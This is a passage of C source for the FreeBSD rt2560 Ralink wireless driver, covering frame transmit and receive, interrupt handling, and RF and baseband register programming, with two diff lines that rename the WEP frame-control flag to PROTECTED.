IEEE80211_T_CCK); tap->wr_antenna = sc->rx_ant; tap->wr_antsignal = nf + rssi; tap->wr_antnoise = nf; } sc->sc_flags |= RT2560_F_INPUT_RUNNING; RAL_UNLOCK(sc); wh = mtod(m, struct ieee80211_frame *); ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); if (ni != NULL) { (void) ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, nf); RAL_LOCK(sc); sc->sc_flags &= ~RT2560_F_INPUT_RUNNING; skip: desc->flags = htole32(RT2560_RX_BUSY); DPRINTFN(sc, 15, "decryption done idx=%u\n", sc->rxq.cur_decrypt); sc->rxq.cur_decrypt = (sc->rxq.cur_decrypt + 1) % RT2560_RX_RING_COUNT; } bus_dmamap_sync(sc->rxq.desc_dmat, sc->rxq.desc_map, BUS_DMASYNC_PREWRITE); } /* * Some frames were received. Pass them to the hardware cipher engine before * sending them to the 802.11 layer. 
*/ static void rt2560_rx_intr(struct rt2560_softc *sc) { struct rt2560_rx_desc *desc; struct rt2560_rx_data *data; bus_dmamap_sync(sc->rxq.desc_dmat, sc->rxq.desc_map, BUS_DMASYNC_POSTREAD); for (;;) { desc = &sc->rxq.desc[sc->rxq.cur]; data = &sc->rxq.data[sc->rxq.cur]; if ((le32toh(desc->flags) & RT2560_RX_BUSY) || (le32toh(desc->flags) & RT2560_RX_CIPHER_BUSY)) break; data->drop = 0; if ((le32toh(desc->flags) & RT2560_RX_PHY_ERROR) || (le32toh(desc->flags) & RT2560_RX_CRC_ERROR)) { /* * This should not happen since we did not request * to receive those frames when we filled RXCSR0. */ DPRINTFN(sc, 5, "PHY or CRC error flags 0x%08x\n", le32toh(desc->flags)); data->drop = 1; } if (((le32toh(desc->flags) >> 16) & 0xfff) > MCLBYTES) { DPRINTFN(sc, 5, "%s\n", "bad length"); data->drop = 1; } /* mark the frame for decryption */ desc->flags |= htole32(RT2560_RX_CIPHER_BUSY); DPRINTFN(sc, 15, "rx done idx=%u\n", sc->rxq.cur); sc->rxq.cur = (sc->rxq.cur + 1) % RT2560_RX_RING_COUNT; } bus_dmamap_sync(sc->rxq.desc_dmat, sc->rxq.desc_map, BUS_DMASYNC_PREWRITE); /* kick decrypt */ RAL_WRITE(sc, RT2560_SECCSR0, RT2560_KICK_DECRYPT); } static void rt2560_beacon_update(struct ieee80211vap *vap, int item) { struct rt2560_vap *rvp = RT2560_VAP(vap); struct ieee80211_beacon_offsets *bo = &rvp->ral_bo; setbit(bo->bo_flags, item); } /* * This function is called periodically in IBSS mode when a new beacon must be * sent out. */ static void rt2560_beacon_expire(struct rt2560_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct rt2560_vap *rvp = RT2560_VAP(vap); struct rt2560_tx_data *data; if (ic->ic_opmode != IEEE80211_M_IBSS && ic->ic_opmode != IEEE80211_M_HOSTAP && ic->ic_opmode != IEEE80211_M_MBSS) return; data = &sc->bcnq.data[sc->bcnq.next]; /* * Don't send beacon if bsschan isn't set */ if (data->ni == NULL) return; bus_dmamap_sync(sc->bcnq.data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->bcnq.data_dmat, data->map); /* XXX 1 =>'s mcast frames which means all PS sta's will wakeup! */ ieee80211_beacon_update(data->ni, &rvp->ral_bo, data->m, 1); rt2560_tx_bcn(sc, data->m, data->ni); DPRINTFN(sc, 15, "%s", "beacon expired\n"); sc->bcnq.next = (sc->bcnq.next + 1) % RT2560_BEACON_RING_COUNT; } /* ARGSUSED */ static void rt2560_wakeup_expire(struct rt2560_softc *sc) { DPRINTFN(sc, 2, "%s", "wakeup expired\n"); } void rt2560_intr(void *arg) { struct rt2560_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; uint32_t r; RAL_LOCK(sc); /* disable interrupts */ RAL_WRITE(sc, RT2560_CSR8, 0xffffffff); /* don't re-enable interrupts if we're shutting down */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { RAL_UNLOCK(sc); return; } r = RAL_READ(sc, RT2560_CSR7); RAL_WRITE(sc, RT2560_CSR7, r); if (r & RT2560_BEACON_EXPIRE) rt2560_beacon_expire(sc); if (r & RT2560_WAKEUP_EXPIRE) rt2560_wakeup_expire(sc); if (r & RT2560_ENCRYPTION_DONE) rt2560_encryption_intr(sc); if (r & RT2560_TX_DONE) rt2560_tx_intr(sc); if (r & RT2560_PRIO_DONE) rt2560_prio_intr(sc); if (r & RT2560_DECRYPTION_DONE) rt2560_decryption_intr(sc); if (r & RT2560_RX_DONE) { rt2560_rx_intr(sc); rt2560_encryption_intr(sc); } /* re-enable interrupts */ RAL_WRITE(sc, RT2560_CSR8, RT2560_INTR_MASK); RAL_UNLOCK(sc); } #define RAL_SIFS 10 /* us */ #define RT2560_TXRX_TURNAROUND 10 /* us */ static uint8_t rt2560_plcp_signal(int rate) { switch (rate) { /* OFDM rates (cf IEEE Std 802.11a-1999, pp. 
14 Table 80) */ case 12: return 0xb; case 18: return 0xf; case 24: return 0xa; case 36: return 0xe; case 48: return 0x9; case 72: return 0xd; case 96: return 0x8; case 108: return 0xc; /* CCK rates (NB: not IEEE std, device-specific) */ case 2: return 0x0; case 4: return 0x1; case 11: return 0x2; case 22: return 0x3; } return 0xff; /* XXX unsupported/unknown rate */ } static void rt2560_setup_tx_desc(struct rt2560_softc *sc, struct rt2560_tx_desc *desc, uint32_t flags, int len, int rate, int encrypt, bus_addr_t physaddr) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t plcp_length; int remainder; desc->flags = htole32(flags); desc->flags |= htole32(len << 16); desc->physaddr = htole32(physaddr); desc->wme = htole16( RT2560_AIFSN(2) | RT2560_LOGCWMIN(3) | RT2560_LOGCWMAX(8)); /* setup PLCP fields */ desc->plcp_signal = rt2560_plcp_signal(rate); desc->plcp_service = 4; len += IEEE80211_CRC_LEN; if (ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_OFDM) { desc->flags |= htole32(RT2560_TX_OFDM); plcp_length = len & 0xfff; desc->plcp_length_hi = plcp_length >> 6; desc->plcp_length_lo = plcp_length & 0x3f; } else { plcp_length = (16 * len + rate - 1) / rate; if (rate == 22) { remainder = (16 * len) % 22; if (remainder != 0 && remainder < 7) desc->plcp_service |= RT2560_PLCP_LENGEXT; } desc->plcp_length_hi = plcp_length >> 8; desc->plcp_length_lo = plcp_length & 0xff; if (rate != 2 && (ic->ic_flags & IEEE80211_F_SHPREAMBLE)) desc->plcp_signal |= 0x08; } if (!encrypt) desc->flags |= htole32(RT2560_TX_VALID); desc->flags |= encrypt ? htole32(RT2560_TX_CIPHER_BUSY) : htole32(RT2560_TX_BUSY); } static int rt2560_tx_bcn(struct rt2560_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct rt2560_tx_desc *desc; struct rt2560_tx_data *data; bus_dma_segment_t segs[RT2560_MAX_SCATTER]; int nsegs, rate, error; desc = &sc->bcnq.desc[sc->bcnq.cur]; data = &sc->bcnq.data[sc->bcnq.cur]; /* XXX maybe a separate beacon rate? 
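	 *
	 * Beacons are queued through the same rt2560_setup_tx_desc() path
	 * as data frames.  For reference, its CCK branch encodes the PLCP
	 * LENGTH field as the frame's airtime in microseconds,
	 * plcp_length = ceil(16 * len / rate), with rate in 500kb/s units.
	 * Worked example (sketch, plain C):
	 *
	 *	int len = 1504;		// 1500-byte frame + 4-byte FCS
	 *	int rate = 22;		// 11 Mb/s
	 *	int us = (16 * len + rate - 1) / rate;	// 1094 us
	 *	int rem = (16 * len) % 22;		// 18 -> no LENGEXT
	 *
	 * Only when that remainder falls in 1..6 does the 11 Mb/s case set
	 * RT2560_PLCP_LENGEXT to disambiguate the final octet.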
*/ rate = vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)].mgmtrate; error = bus_dmamap_load_mbuf_sg(sc->bcnq.data_dmat, data->map, m0, segs, &nsegs, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (ieee80211_radiotap_active_vap(vap)) { struct rt2560_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; tap->wt_antenna = sc->tx_ant; ieee80211_radiotap_tx(vap, m0); } data->m = m0; data->ni = ni; rt2560_setup_tx_desc(sc, desc, RT2560_TX_IFS_NEWBACKOFF | RT2560_TX_TIMESTAMP, m0->m_pkthdr.len, rate, 0, segs->ds_addr); DPRINTFN(sc, 10, "sending beacon frame len=%u idx=%u rate=%u\n", m0->m_pkthdr.len, sc->bcnq.cur, rate); bus_dmamap_sync(sc->bcnq.data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->bcnq.desc_dmat, sc->bcnq.desc_map, BUS_DMASYNC_PREWRITE); sc->bcnq.cur = (sc->bcnq.cur + 1) % RT2560_BEACON_RING_COUNT; return 0; } static int rt2560_tx_mgt(struct rt2560_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct rt2560_tx_desc *desc; struct rt2560_tx_data *data; struct ieee80211_frame *wh; struct ieee80211_key *k; bus_dma_segment_t segs[RT2560_MAX_SCATTER]; uint16_t dur; uint32_t flags = 0; int nsegs, rate, error; desc = &sc->prioq.desc[sc->prioq.cur]; data = &sc->prioq.data[sc->prioq.cur]; rate = vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)].mgmtrate; wh = mtod(m0, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } } error = bus_dmamap_load_mbuf_sg(sc->prioq.data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (ieee80211_radiotap_active_vap(vap)) { struct rt2560_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; tap->wt_antenna = sc->tx_ant; ieee80211_radiotap_tx(vap, m0); } data->m = m0; data->ni = ni; /* management frames are not taken into account for amrr */ data->rix = IEEE80211_FIXED_RATE_NONE; wh = mtod(m0, struct ieee80211_frame *); if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { flags |= RT2560_TX_ACK; dur = ieee80211_ack_duration(ic->ic_rt, rate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); *(uint16_t *)wh->i_dur = htole16(dur); /* tell hardware to add timestamp for probe responses */ if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_MGT && (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) == IEEE80211_FC0_SUBTYPE_PROBE_RESP) flags |= RT2560_TX_TIMESTAMP; } rt2560_setup_tx_desc(sc, desc, flags, m0->m_pkthdr.len, rate, 0, segs->ds_addr); bus_dmamap_sync(sc->prioq.data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->prioq.desc_dmat, sc->prioq.desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(sc, 10, "sending mgt frame len=%u idx=%u rate=%u\n", m0->m_pkthdr.len, sc->prioq.cur, rate); /* kick prio */ sc->prioq.queued++; sc->prioq.cur = (sc->prioq.cur + 1) % RT2560_PRIO_RING_COUNT; RAL_WRITE(sc, RT2560_TXCSR0, RT2560_KICK_PRIO); return 0; } static int rt2560_sendprot(struct rt2560_softc *sc, const struct mbuf *m, struct ieee80211_node *ni, int prot, int rate) { struct ieee80211com *ic = ni->ni_ic; const struct ieee80211_frame *wh; struct rt2560_tx_desc *desc; struct rt2560_tx_data *data; struct mbuf *mprot; int protrate, ackrate, pktlen, flags, isshort, error; uint16_t dur; 
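	/*
	 * The duration computed below is the NAV the protection frame has
	 * to reserve: for CTS-to-self it covers the protected data frame
	 * plus its ACK, and for RTS/CTS one more ieee80211_ack_duration()
	 * is added because the CTS that answers the RTS is the same size
	 * as an ACK.  Roughly (sketch only, ignoring interframe spacing):
	 *
	 *	dur(CTS-to-self) = txtime(data) + txtime(ACK)
	 *	dur(RTS)         = txtime(CTS) + txtime(data) + txtime(ACK)
	 */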
bus_dma_segment_t segs[RT2560_MAX_SCATTER]; int nsegs; KASSERT(prot == IEEE80211_PROT_RTSCTS || prot == IEEE80211_PROT_CTSONLY, ("protection %d", prot)); wh = mtod(m, const struct ieee80211_frame *); pktlen = m->m_pkthdr.len + IEEE80211_CRC_LEN; protrate = ieee80211_ctl_rate(ic->ic_rt, rate); ackrate = ieee80211_ack_rate(ic->ic_rt, rate); isshort = (ic->ic_flags & IEEE80211_F_SHPREAMBLE) != 0; dur = ieee80211_compute_duration(ic->ic_rt, pktlen, rate, isshort) + ieee80211_ack_duration(ic->ic_rt, rate, isshort); flags = RT2560_TX_MORE_FRAG; if (prot == IEEE80211_PROT_RTSCTS) { /* NB: CTS is the same size as an ACK */ dur += ieee80211_ack_duration(ic->ic_rt, rate, isshort); flags |= RT2560_TX_ACK; mprot = ieee80211_alloc_rts(ic, wh->i_addr1, wh->i_addr2, dur); } else { mprot = ieee80211_alloc_cts(ic, ni->ni_vap->iv_myaddr, dur); } if (mprot == NULL) { /* XXX stat + msg */ return ENOBUFS; } desc = &sc->txq.desc[sc->txq.cur_encrypt]; data = &sc->txq.data[sc->txq.cur_encrypt]; error = bus_dmamap_load_mbuf_sg(sc->txq.data_dmat, data->map, mprot, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(mprot); return error; } data->m = mprot; data->ni = ieee80211_ref_node(ni); /* ctl frames are not taken into account for amrr */ data->rix = IEEE80211_FIXED_RATE_NONE; rt2560_setup_tx_desc(sc, desc, flags, mprot->m_pkthdr.len, protrate, 1, segs->ds_addr); bus_dmamap_sync(sc->txq.data_dmat, data->map, BUS_DMASYNC_PREWRITE); sc->txq.queued++; sc->txq.cur_encrypt = (sc->txq.cur_encrypt + 1) % RT2560_TX_RING_COUNT; return 0; } static int rt2560_tx_raw(struct rt2560_softc *sc, struct mbuf *m0, struct ieee80211_node *ni, const struct ieee80211_bpf_params *params) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct rt2560_tx_desc *desc; struct rt2560_tx_data *data; bus_dma_segment_t segs[RT2560_MAX_SCATTER]; uint32_t flags; int nsegs, rate, error; desc = &sc->prioq.desc[sc->prioq.cur]; data = &sc->prioq.data[sc->prioq.cur]; rate = params->ibp_rate0; if (!ieee80211_isratevalid(ic->ic_rt, rate)) { /* XXX fall back to mcast/mgmt rate? */ m_freem(m0); return EINVAL; } flags = 0; if ((params->ibp_flags & IEEE80211_BPF_NOACK) == 0) flags |= RT2560_TX_ACK; if (params->ibp_flags & (IEEE80211_BPF_RTS|IEEE80211_BPF_CTS)) { error = rt2560_sendprot(sc, m0, ni, params->ibp_flags & IEEE80211_BPF_RTS ? 
IEEE80211_PROT_RTSCTS : IEEE80211_PROT_CTSONLY, rate); if (error) { m_freem(m0); return error; } flags |= RT2560_TX_LONG_RETRY | RT2560_TX_IFS_SIFS; } error = bus_dmamap_load_mbuf_sg(sc->prioq.data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (ieee80211_radiotap_active_vap(vap)) { struct rt2560_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; tap->wt_antenna = sc->tx_ant; ieee80211_radiotap_tx(ni->ni_vap, m0); } data->m = m0; data->ni = ni; /* XXX need to setup descriptor ourself */ rt2560_setup_tx_desc(sc, desc, flags, m0->m_pkthdr.len, rate, (params->ibp_flags & IEEE80211_BPF_CRYPTO) != 0, segs->ds_addr); bus_dmamap_sync(sc->prioq.data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->prioq.desc_dmat, sc->prioq.desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(sc, 10, "sending raw frame len=%u idx=%u rate=%u\n", m0->m_pkthdr.len, sc->prioq.cur, rate); /* kick prio */ sc->prioq.queued++; sc->prioq.cur = (sc->prioq.cur + 1) % RT2560_PRIO_RING_COUNT; RAL_WRITE(sc, RT2560_TXCSR0, RT2560_KICK_PRIO); return 0; } static int rt2560_tx_data(struct rt2560_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct rt2560_tx_desc *desc; struct rt2560_tx_data *data; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; struct ieee80211_key *k; struct mbuf *mnew; bus_dma_segment_t segs[RT2560_MAX_SCATTER]; uint16_t dur; uint32_t flags; int nsegs, rate, error; wh = mtod(m0, struct ieee80211_frame *); tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; if (IEEE80211_IS_MULTICAST(wh->i_addr1)) { rate = tp->mcastrate; } else if (m0->m_flags & M_EAPOL) { rate = tp->mgmtrate; } else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) { rate = tp->ucastrate; } else { (void) ieee80211_ratectl_rate(ni, NULL, 0); rate = ni->ni_txrate; } - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } flags = 0; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { int prot = IEEE80211_PROT_NONE; if (m0->m_pkthdr.len + IEEE80211_CRC_LEN > vap->iv_rtsthreshold) prot = IEEE80211_PROT_RTSCTS; else if ((ic->ic_flags & IEEE80211_F_USEPROT) && ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_OFDM) prot = ic->ic_protmode; if (prot != IEEE80211_PROT_NONE) { error = rt2560_sendprot(sc, m0, ni, prot, rate); if (error) { m_freem(m0); return error; } flags |= RT2560_TX_LONG_RETRY | RT2560_TX_IFS_SIFS; } } data = &sc->txq.data[sc->txq.cur_encrypt]; desc = &sc->txq.desc[sc->txq.cur_encrypt]; error = bus_dmamap_load_mbuf_sg(sc->txq.data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (error != 0) { mnew = m_defrag(m0, M_NOWAIT); if (mnew == NULL) { device_printf(sc->sc_dev, "could not defragment mbuf\n"); m_freem(m0); return ENOBUFS; } m0 = mnew; error = bus_dmamap_load_mbuf_sg(sc->txq.data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } if 
(ieee80211_radiotap_active_vap(vap)) { struct rt2560_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; tap->wt_antenna = sc->tx_ant; ieee80211_radiotap_tx(vap, m0); } data->m = m0; data->ni = ni; /* remember link conditions for rate adaptation algorithm */ if (tp->ucastrate == IEEE80211_FIXED_RATE_NONE) { data->rix = ni->ni_txrate; /* XXX probably need last rssi value and not avg */ data->rssi = ic->ic_node_getrssi(ni); } else data->rix = IEEE80211_FIXED_RATE_NONE; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { flags |= RT2560_TX_ACK; dur = ieee80211_ack_duration(ic->ic_rt, rate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); *(uint16_t *)wh->i_dur = htole16(dur); } rt2560_setup_tx_desc(sc, desc, flags, m0->m_pkthdr.len, rate, 1, segs->ds_addr); bus_dmamap_sync(sc->txq.data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->txq.desc_dmat, sc->txq.desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(sc, 10, "sending data frame len=%u idx=%u rate=%u\n", m0->m_pkthdr.len, sc->txq.cur_encrypt, rate); /* kick encrypt */ sc->txq.queued++; sc->txq.cur_encrypt = (sc->txq.cur_encrypt + 1) % RT2560_TX_RING_COUNT; RAL_WRITE(sc, RT2560_SECCSR1, RT2560_KICK_ENCRYPT); return 0; } static void rt2560_start_locked(struct ifnet *ifp) { struct rt2560_softc *sc = ifp->if_softc; struct mbuf *m; struct ieee80211_node *ni; RAL_LOCK_ASSERT(sc); for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; if (sc->txq.queued >= RT2560_TX_RING_COUNT - 1) { IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; sc->sc_flags |= RT2560_F_DATA_OACTIVE; break; } ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; if (rt2560_tx_data(sc, m, ni) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; break; } sc->sc_tx_timer = 5; } } static void rt2560_start(struct ifnet *ifp) { struct rt2560_softc *sc = ifp->if_softc; RAL_LOCK(sc); rt2560_start_locked(ifp); RAL_UNLOCK(sc); } static void rt2560_watchdog(void *arg) { struct rt2560_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; RAL_LOCK_ASSERT(sc); KASSERT(ifp->if_drv_flags & IFF_DRV_RUNNING, ("not running")); if (sc->sc_invalid) /* card ejected */ return; rt2560_encryption_intr(sc); rt2560_tx_intr(sc); if (sc->sc_tx_timer > 0 && --sc->sc_tx_timer == 0) { if_printf(ifp, "device timeout\n"); rt2560_init_locked(sc); ifp->if_oerrors++; /* NB: callout is reset in rt2560_init() */ return; } callout_reset(&sc->watchdog_ch, hz, rt2560_watchdog, sc); } static int rt2560_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct rt2560_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: RAL_LOCK(sc); if (ifp->if_flags & IFF_UP) { if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { rt2560_init_locked(sc); startall = 1; } else rt2560_update_promisc(ifp); } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) rt2560_stop_locked(sc); } RAL_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } static void rt2560_bbp_write(struct rt2560_softc *sc, uint8_t reg, uint8_t val) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2560_BBPCSR) & RT2560_BBP_BUSY)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to BBP\n"); return; } tmp = RT2560_BBP_WRITE | RT2560_BBP_BUSY | reg << 
8 | val; RAL_WRITE(sc, RT2560_BBPCSR, tmp); DPRINTFN(sc, 15, "BBP R%u <- 0x%02x\n", reg, val); } static uint8_t rt2560_bbp_read(struct rt2560_softc *sc, uint8_t reg) { uint32_t val; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2560_BBPCSR) & RT2560_BBP_BUSY)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not read from BBP\n"); return 0; } val = RT2560_BBP_BUSY | reg << 8; RAL_WRITE(sc, RT2560_BBPCSR, val); for (ntries = 0; ntries < 100; ntries++) { val = RAL_READ(sc, RT2560_BBPCSR); if (!(val & RT2560_BBP_BUSY)) return val & 0xff; DELAY(1); } device_printf(sc->sc_dev, "could not read from BBP\n"); return 0; } static void rt2560_rf_write(struct rt2560_softc *sc, uint8_t reg, uint32_t val) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2560_RFCSR) & RT2560_RF_BUSY)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to RF\n"); return; } tmp = RT2560_RF_BUSY | RT2560_RF_20BIT | (val & 0xfffff) << 2 | (reg & 0x3); RAL_WRITE(sc, RT2560_RFCSR, tmp); /* remember last written value in sc */ sc->rf_regs[reg] = val; DPRINTFN(sc, 15, "RF R[%u] <- 0x%05x\n", reg & 0x3, val & 0xfffff); } static void rt2560_set_chan(struct rt2560_softc *sc, struct ieee80211_channel *c) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint8_t power, tmp; u_int i, chan; chan = ieee80211_chan2ieee(ic, c); KASSERT(chan != 0 && chan != IEEE80211_CHAN_ANY, ("chan 0x%x", chan)); if (IEEE80211_IS_CHAN_2GHZ(c)) power = min(sc->txpow[chan - 1], 31); else power = 31; /* adjust txpower using ifconfig settings */ power -= (100 - ic->ic_txpowlimit) / 8; DPRINTFN(sc, 2, "setting channel to %u, txpower to %u\n", chan, power); switch (sc->rf_rev) { case RT2560_RF_2522: rt2560_rf_write(sc, RAL_RF1, 0x00814); rt2560_rf_write(sc, RAL_RF2, rt2560_rf2522_r2[chan - 1]); rt2560_rf_write(sc, RAL_RF3, power << 7 | 0x00040); break; case RT2560_RF_2523: rt2560_rf_write(sc, RAL_RF1, 0x08804); rt2560_rf_write(sc, RAL_RF2, rt2560_rf2523_r2[chan - 1]); rt2560_rf_write(sc, RAL_RF3, power << 7 | 0x38044); rt2560_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00280 : 0x00286); break; case RT2560_RF_2524: rt2560_rf_write(sc, RAL_RF1, 0x0c808); rt2560_rf_write(sc, RAL_RF2, rt2560_rf2524_r2[chan - 1]); rt2560_rf_write(sc, RAL_RF3, power << 7 | 0x00040); rt2560_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00280 : 0x00286); break; case RT2560_RF_2525: rt2560_rf_write(sc, RAL_RF1, 0x08808); rt2560_rf_write(sc, RAL_RF2, rt2560_rf2525_hi_r2[chan - 1]); rt2560_rf_write(sc, RAL_RF3, power << 7 | 0x18044); rt2560_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00280 : 0x00286); rt2560_rf_write(sc, RAL_RF1, 0x08808); rt2560_rf_write(sc, RAL_RF2, rt2560_rf2525_r2[chan - 1]); rt2560_rf_write(sc, RAL_RF3, power << 7 | 0x18044); rt2560_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00280 : 0x00286); break; case RT2560_RF_2525E: rt2560_rf_write(sc, RAL_RF1, 0x08808); rt2560_rf_write(sc, RAL_RF2, rt2560_rf2525e_r2[chan - 1]); rt2560_rf_write(sc, RAL_RF3, power << 7 | 0x18044); rt2560_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00286 : 0x00282); break; case RT2560_RF_2526: rt2560_rf_write(sc, RAL_RF2, rt2560_rf2526_hi_r2[chan - 1]); rt2560_rf_write(sc, RAL_RF4, (chan & 1) ? 0x00386 : 0x00381); rt2560_rf_write(sc, RAL_RF1, 0x08804); rt2560_rf_write(sc, RAL_RF2, rt2560_rf2526_r2[chan - 1]); rt2560_rf_write(sc, RAL_RF3, power << 7 | 0x18044); rt2560_rf_write(sc, RAL_RF4, (chan & 1) ? 
0x00386 : 0x00381); break; /* dual-band RF */ case RT2560_RF_5222: for (i = 0; rt2560_rf5222[i].chan != chan; i++); rt2560_rf_write(sc, RAL_RF1, rt2560_rf5222[i].r1); rt2560_rf_write(sc, RAL_RF2, rt2560_rf5222[i].r2); rt2560_rf_write(sc, RAL_RF3, power << 7 | 0x00040); rt2560_rf_write(sc, RAL_RF4, rt2560_rf5222[i].r4); break; default: printf("unknown ral rev=%d\n", sc->rf_rev); } /* XXX */ if ((ic->ic_flags & IEEE80211_F_SCAN) == 0) { /* set Japan filter bit for channel 14 */ tmp = rt2560_bbp_read(sc, 70); tmp &= ~RT2560_JAPAN_FILTER; if (chan == 14) tmp |= RT2560_JAPAN_FILTER; rt2560_bbp_write(sc, 70, tmp); /* clear CRC errors */ RAL_READ(sc, RT2560_CNT0); } } static void rt2560_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2560_softc *sc = ifp->if_softc; RAL_LOCK(sc); rt2560_set_chan(sc, ic->ic_curchan); RAL_UNLOCK(sc); } #if 0 /* * Disable RF auto-tuning. */ static void rt2560_disable_rf_tune(struct rt2560_softc *sc) { uint32_t tmp; if (sc->rf_rev != RT2560_RF_2523) { tmp = sc->rf_regs[RAL_RF1] & ~RAL_RF1_AUTOTUNE; rt2560_rf_write(sc, RAL_RF1, tmp); } tmp = sc->rf_regs[RAL_RF3] & ~RAL_RF3_AUTOTUNE; rt2560_rf_write(sc, RAL_RF3, tmp); DPRINTFN(sc, 2, "%s", "disabling RF autotune\n"); } #endif /* * Refer to IEEE Std 802.11-1999 pp. 123 for more information on TSF * synchronization. */ static void rt2560_enable_tsf_sync(struct rt2560_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); uint16_t logcwmin, preload; uint32_t tmp; /* first, disable TSF synchronization */ RAL_WRITE(sc, RT2560_CSR14, 